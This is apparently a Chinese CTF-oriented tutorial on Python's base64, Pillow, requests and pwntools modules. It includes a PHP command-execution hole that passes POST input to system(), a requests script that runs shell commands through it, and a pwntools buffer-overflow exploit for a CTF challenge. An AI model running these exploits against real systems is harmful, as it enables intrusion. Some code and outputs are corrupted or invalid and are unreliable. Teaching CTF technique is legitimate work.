Base64\u662f\u4e00\u79cd\u4efb\u610f\u4e8c\u8fdb\u5236\u5230\u6587\u672c\u5b57\u7b26\u4e32\u7684\u7f16\u7801\u65b9\u6cd5\uff0c\u5e38\u7528\u4e8e\u5728URL\u3001Cookie\u3001\u7f51\u9875\u4e2d\u4f20\u8f93\u5c11\u91cf\u4e8c\u8fdb\u5236\u6570\u636e\u3002<\/p>\n
>>> import base64#\u5bfc\u5165\n>>> base64.b64encode(b'library')#\u7f16\u7801\uff0cb\u4ee3\u8868bytes\nb'bGlicmFyeQ=='#base64\u6700\u591a\u6709\u4e24\u4e2a\u7b49\u53f7\n>>> base64.b64decode('bGlicmFyeQ==')#\u89e3\u7801\nb'library'\n>>> base64.b32encode(b'library')#base32\u7f16\u7801\nb'NRUWE4TBOJ4Q===='\n>>> base64.b32decode(b'NRUWE4TBOJ4Q====')\nb'library'\n#\u540c\u6837base16\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8fd9\u79cd\u65b9\u5f0f\u7f16\u7801<\/code><\/pre>\n\u6848\u4f8b\uff1a\u5faa\u73af\u7f16\u89e3\u7801base64<\/p>\n
import base64\nflag=b'flag{thisisflag}'\nfor i in range(10):\n flag=base64.b64encode(flag)\nprint(flag)\nfor i in range(10):\n flag=base64.b64decode(flag)\nprint(flag)\n\nb'Vm0wd2QyVkhVWGhVYmxKV1YwZDRXRmxVUm5kVlJscHpXa2M1VjFKdGVGWlZNbmhQWVd4S2MxTnNXbGRTTTFKUVdWY3hTMUl4WkhWaVJtUnBWMFpHTsktop1.py' TFkV1dsWmxSbGw0V2toV2FGSnNjRTlaYlhSTFZsWmFjbFZyZEZSTlZUVkpWbTEwYTJGR1NuVlJiR2hYWWxob1YxcFZXbXRXTVdSMFVteG9hVlpyV1RGTFkV1dsWmxSbGw0V2toV2FGSnNjRTlaYlhSTFZsWmFjbFZyZEZSV2EyUXdXVmRHVjFOdVRtcFRSVXBZV1ZSR1lWTkdVbkpYYlhSWVVqRmFTVlZ0ZUd0VWJGcDFVV3hvVjFKc2NGaFdha3BIVTBaYWRWSnNTbGRTTTAwMQ=qRmFTVlZ0ZUd0VWJGcDFVV3hvVjFKc2NGaFdha3BIVTBaYWRWSn='\nb'flag{thisisflag}'<\/code><\/pre>\n\u7531\u4e8e\u6807\u51c6\u7684Base64\u7f16\u7801\u540e\u53ef\u80fd\u51fa\u73b0\u5b57\u7b26+\u548c\/\uff0c\u5728URL\u4e2d\u5c31\u4e0d\u80fd\u76f4\u63a5\u4f5c\u4e3a\u53c2\u6570\uff0c\u6240\u4ee5\u53c8\u6709\u4e00\u79cd"url safe"\u7684base64\u7f16\u7801\uff0c\u5176\u5b9e\u5c31\u662f\u628a\u5b57\u7b26+\u548c\/\u5206\u522b\u53d8\u6210-\u548c_\uff1a<\/p>\n
>>> base64.b64encode(b'ixb7x1dxfbxefxff')\nb'abcd++\/\/'\n>>> base64.urlsafe_b64encode(b'ixb7x1dxfbxefxff')\nb'abcd--__'\n>>> base64.urlsafe_b64decode('abcd--__')\nb'ixb7x1dxfbxefxff'<\/code><\/pre>\n\u7b2c\u4e09\u65b9\u6a21\u5757<\/h1>\nPillow<\/h2>\n
pillow\u662fpython\u7684\u4e00\u4e2a\u7b2c\u4e09\u65b9\u6a21\u5757\uff0c\u9700\u8981\u81ea\u5df1\u5b89\u88c5\u3002\u5728\u547d\u4ee4\u884c\u4e0b\u901a\u8fc7pip\u5b89\u88c5<\/p>\n
\u03bb pip install pillow\n#\u5982\u679c\u9047\u5230Permission denied\u5b89\u88c5\u5931\u8d25\uff0c\u8bf7\u52a0\u4e0asudo\u91cd\u8bd5\u3002<\/code><\/pre>\n\u5e38\u7528\u7684\u56fe\u50cf\u64cd\u4f5c<\/p>\n
from PIL import Image\n\n# \u6253\u5f00\u4e00\u4e2ajpg\u56fe\u50cf\u6587\u4ef6\uff0c\u6ce8\u610f\u662f\u5f53\u524d\u8def\u5f84:\nim = Image.open('test.jpg')\n# \u83b7\u5f97\u56fe\u50cf\u5c3a\u5bf8:\nw, h = im.size\nprint('Original image size: %sx%s' % (w, h))\n# \u628a\u56fe\u50cf\u7528jpeg\u683c\u5f0f\u4fdd\u5b58:\nim.save('test.jpg', 'jpeg')<\/code><\/pre>\n\u6848\u4f8b\uff1a\u5c06\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\u62fc\u6210\u4e8c\u7ef4\u7801<\/p>\n
import PIL from Image\nMAX = 25#\u5b9a\u4e49\u4e8c\u7ef4\u7801\u7684\u957f\u6b3e\npic = Image.new(\"RGB\",(MAX, MAX))#\u521b\u5efa\u4e00\u4e2a\u56fe\u7247\nstr = \"000000000000000000000000000011111110100001001011111110010000010110011001010000010010111010001001101010111010010111010010010110010111010010111010111100000010111010010000010100010010010000010011111110101010101011111110000000000000001101000000000011110110010001111101100110000111100001101001010011110000011111101001000110100000001000001000010110000101100001111010100101101001011010011000001110010111100101110011100010010110100101101000001000001111111111000001010010010110111111101111100000000000000010001001000110100011111110000110001010111000010000010100010101000111100010111010011001101111100010010111010100001001000011010010111010101110011101100110010000010100110011001011110011111110100000011100110010000000000000000000000000000\"\ni=0\nfor y in range (0,MAX):\n for x in range (0,MAX):\n if(str[i] == '1'):\n pic.putpixel([x,y],(0, 0, 0)) #\u586b\u5145\u50cf\u7d20[\u5750\u6807],(r,g,b)\u5143\u7ec4\u503c\n else:\n pic.putpixel([x,y],(255,255,255))\n i = i+1\npic.show() #\u663e\u793a\u56fe\u50cf\npic.save(\"flag.png\") #\u4fdd\u5b58\u56fe\u50cf<\/code><\/pre>\n\u5982\u679c\u7ed9\u7684\u6570\u636e\u4e0d\u662f\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\u800c\u662frgb\u7684\u503c\uff0c\u53ef\u4ee5\u5c06for\u5faa\u73af\u4e2d\u7684\u5185\u5bb9\u7a0d\u4f5c\u6539\u53d8<\/p>\n
for i in range(0, x):\n for j in range(0, y):\n line = file.readline() #\u83b7\u53d6\u4e00\u884c\u7684rgb\u503c\n rgb = line.split(\", \") #\u5206\u79bbrgb\uff0c\u6587\u672c\u4e2d\u9017\u53f7\u540e\u9762\u6709\u7a7a\u683c\n im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2]))) #\u5c06rgb\u8f6c\u5316\u4e3a\u50cf\u7d20<\/code><\/pre>\nRequest<\/h2>\n
Python\u5185\u7f6e\u7684urllib\u6a21\u5757\uff0c\u7528\u4e8e\u8bbf\u95ee\u7f51\u7edc\u8d44\u6e90\u3002\u4f46\u662f\uff0c\u5b83\u7528\u8d77\u6765\u6bd4\u8f83\u9ebb\u70e6\uff0c\u800c\u4e14\uff0c\u7f3a\u5c11\u5f88\u591a\u5b9e\u7528\u7684\u9ad8\u7ea7\u529f\u80fd\uff0c\u66f4\u597d\u7684\u65b9\u6848\u662f\u4f7f\u7528requests\u3002\u5b83\u662f\u4e00\u4e2aPython\u7b2c\u4e09\u65b9\u5e93\uff0c\u5904\u7406URL\u8d44\u6e90\u7279\u522b\u65b9\u4fbf\u3002
\n\u5728\u547d\u4ee4\u884c\u4e0b\u901a\u8fc7pip\u5b89\u88c5\uff1a<\/p>\n
$ pip install requests<\/code><\/pre>\nget<\/p>\n
>>> import requests\n>>> r = requests.get('https:\/\/www.baidu.com\/') # \u8c46\u74e3\u9996\u9875\n>>> r.status_code\n200\n>>> r.text\n\n#\u5bf9\u4e8e\u5e26\u53c2\u6570\u7684URL\uff0c\u4f20\u5165\u4e00\u4e2adict\u4f5c\u4e3aparams\u53c2\u6570\uff1a\n>>> r = requests.get('https:\/\/www.douban.com\/search', params={'q': 'python', 'cat': '1001'})\n>>> r.url # \u5b9e\u9645\u8bf7\u6c42\u7684URL\n'https:\/\/www.douban.com\/search?q=python&cat=1001\n\n#\u9700\u8981\u4f20\u5165HTTP Header\u65f6\uff0c\u6211\u4eec\u4f20\u5165\u4e00\u4e2adict\u4f5c\u4e3aheaders\u53c2\u6570\uff1a\n>>> r = requests.get('https:\/\/www.douban.com\/', headers={'User-Agent': 'Mozilla\/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit'})\n>>> r.text\n'<!DOCTYPE html>n<html>n<head>n<meta charset=\"UTF-8\">n <title>\u8c46\u74e3(\u624b\u673a\u7248)<\/title>...'<\/code><\/pre>\npost<\/p>\n
>>> r = requests.post('https:\/\/accounts.douban.com\/login', data={'form_email': 'abc@example.com', 'form_password': '123456'})\n\n#\u8981\u5728\u8bf7\u6c42\u4e2d\u4f20\u5165Cookie\uff0c\u53ea\u9700\u51c6\u5907\u4e00\u4e2adict\u4f20\u5165cookies\u53c2\u6570\uff1a\n>>> cs = {'token': '12345', 'status': 'working'}\n>>> r = requests.get(url, cookies=cs)<\/code><\/pre>\n\u6848\u4f8b\uff1a\u5047\u8bbe\u67d0\u7f51\u7ad9footer\u680f\u8f93\u5165\u6846\u5b58\u5728rce\uff0c\u6211\u6ca1\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528requests\u6765\u5229\u7528<\/p>\n
#\u6f0f\u6d1e\u70b9\n<?php \n $shell=$_POST['shell'];\n system($shell);\n if($shell !=\"\"){\n exit();\n }\n?><\/code><\/pre>\nurl='192.168.1.111:8080'\nr=requests.post(url,data={'shell':'echo \"flag{39.107.233.1}\" > a8flag'})\n#\u53ef\u4ee5\u76f4\u63a5\u53bb\u6267\u884cshell\u547d\u4ee4\uff0c\u65b9\u4fbf\u6279\u91cf\u5229\u7528<\/code><\/pre>\npwntools<\/h2>\n
pwntools\u662f\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5229\u7528\u6846\u67b6\u3002\u7531\u4e8e\u662fpython\u7684\u7b2c\u4e09\u65b9\u6a21\u5757\uff0c\u9700\u8981\u81ea\u5df1\u5355\u72ec\u5b89\u88c5\u3002<\/p>\n
pip3 install pwn\n#\u6ca1\u6709pip\u8bf7\u5148\u5b89\u88c5pip<\/code><\/pre>\nfrom pwn import *\nurl=39.107.233.1\nc = remote(url, 9000)\n\nsend(payload)#\u53d1\u9001payload\uff1b\n\nsendline(payload) #\u53d1\u9001payload\uff0c\u5e76\u8fdb\u884c\u6362\u884c\uff08\u672b\u5c3en\uff09\uff1b\n\nsendafter(some_string, payload)#\u63a5\u6536\u5230 some_string \u540e\uff0c\u53d1\u9001\u4f60\u7684 payload\uff1b\n\nrecvn(N) #\u63a5\u53d7 N(\u6570\u5b57) \u5b57\u7b26\uff1b\n\nrecvline() #\u63a5\u6536\u4e00\u884c\u8f93\u51fa\uff1b\n\nrecvlines(N)#\u63a5\u6536 N(\u6570\u5b57) \u884c\u8f93\u51fa\uff1b\n\nrecvuntil(some_string)#\u63a5\u6536\u5230 some_string \u4e3a\u6b62\u3002<\/code><\/pre>\n\u6848\u4f8b\uff1a\u653b\u9632\u4e16\u754c-level0
\nexp<\/p>\n
from pwn import * \np=remote('111.198.29.45','44470') p.sendafter('d','a'*136+p64(0x400596)) \np.interactive()<\/code><\/pre>\n\n